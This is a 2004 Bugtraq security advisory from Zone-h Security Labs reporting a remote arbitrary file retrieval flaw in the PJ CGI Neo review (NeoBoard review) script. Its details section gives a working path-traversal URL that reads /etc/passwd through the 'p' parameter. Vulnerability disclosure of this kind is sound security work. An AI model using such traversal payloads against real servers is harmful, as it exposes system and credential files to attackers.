Bugtraq mailing list archives

ZH2004-02SA (security advisory): PJ CGI Neo review (NeoBoard review) Remote arbitrary file retrieving

From: ZetaLabs <zetalabs () zone-h org>
Date: 29 Jan 2004 10:40:43 -0000



ZH2004-02SA (security advisory): PJ CGI Neo review (NeoBoard review) Remote arbitrary file retrieving

Published: 29 january 2004

Released: 29 january 2004

Name: PJ CGI Neo review (NeoBoard review)

Affected Systems: Current version

Issue: Remote file retrieving

Author: Zone-h Security Labs

Vendor: http://www.livepj.com


Description

***********

Zone-h Security Team has discovered a flaw in PJ CGI Neo review (NeoBoard review). There is a vulnerability in the 
current version of NeoBoard that allows an attacker to retrieve arbitrary files from the webserver with its priviledges.



Details

******* 


It's possibile for a remote attacker to retrieve any file from a webserver. 

For example try this:

http://address/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd




Solution:

*********

The vendor has not been contacted because his site is unreachable.


http://www.zone-h.org/advisories/read/id=3824

Current thread:

ZH2004-02SA (security advisory): PJ CGI Neo review (NeoBoard review) Remote arbitrary file retrieving ZetaLabs (Jan 29)